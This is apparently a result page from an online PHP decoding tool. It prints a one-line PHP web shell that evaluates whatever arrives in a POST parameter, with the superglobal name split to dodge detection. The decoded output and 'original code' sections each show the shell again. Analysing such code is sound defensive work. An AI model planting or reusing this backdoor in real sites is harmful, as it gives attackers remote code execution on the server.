Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //@eval($_POST['op']); @eval(${"_P"."OST"}['op']); ?>..

Decoded Output download

<?php
    //@eval($_POST['op']);
    @eval(${"_P"."OST"}['op']);
?>

Did this file decode correctly?

Original Code

<?php
    //@eval($_POST['op']);
    @eval(${"_P"."OST"}['op']);
?>

Function Calls

None

Variables

None

Stats

MD5 01170480652d320ba5f3e6dbc62c50eb
Eval Count 0
Decode Time 119 ms